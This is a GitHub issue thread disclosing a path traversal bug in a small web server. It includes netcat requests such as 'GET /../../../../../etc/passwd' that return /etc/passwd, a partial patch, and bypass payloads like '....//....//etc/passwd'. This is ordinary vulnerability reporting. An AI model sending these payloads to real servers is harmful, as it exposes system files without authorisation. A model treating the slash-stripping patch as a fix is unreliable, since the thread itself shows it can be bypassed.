Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

security issue with requests outside of www root #2

Open
Cotix opened this issue Jul 5, 2016 · 3 comments
Open

security issue with requests outside of www root #2

Cotix opened this issue Jul 5, 2016 · 3 comments

Comments

@Cotix
Copy link

@Cotix Cotix commented Jul 5, 2016

It is possible to request parent directories.

cotix@lithium:~$ nc localhost 9999
GET /../../../../../etc/passwd HTTP/1.0

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-length: 2333
Content-type: text/plain

root0:0:root:/root:/bin/bash
... my whole /etc/passwd

It is also possible to query absolute paths:

cotix@lithium:~$ nc localhost 9999
GET //etc/passwd HTTP/1.0

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-length: 2333
Content-type: text/plain

root0:0:root:/root:/bin/bash

@Cotix Cotix changed the title security issue with parent directory request security issue with requests outside of www root Jul 5, 2016
@timsoftgit
Copy link

@timsoftgit timsoftgit commented May 30, 2017

this can be fixed by changing the lines

 if(uri[0] == '/'){
         filename = uri + 1;

for
while (filename[0] == '/') { filename = filename+1; }
and removing the extra closing brace }
it prevents the //etc/passwd style direct path hack and seems to prevent /../../../etc/passwd style indirect directory hack as well

@keymandll
Copy link

@keymandll keymandll commented Jun 27, 2019

@timsoftgit does not it prevent the /../../../etc/passwd style attack because URI ends up being ../../../etc/passwd style? I suggest you try your suggested fix with the below payload (URI) as well.

//../../../etc/passwd

@timsoftgit
Copy link

@timsoftgit timsoftgit commented Jul 1, 2019

you're right. To do it properly you have to filter out all ../ recursively as well, otherwise something like
....//....//etc/passwd would also be a problem.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
3 participants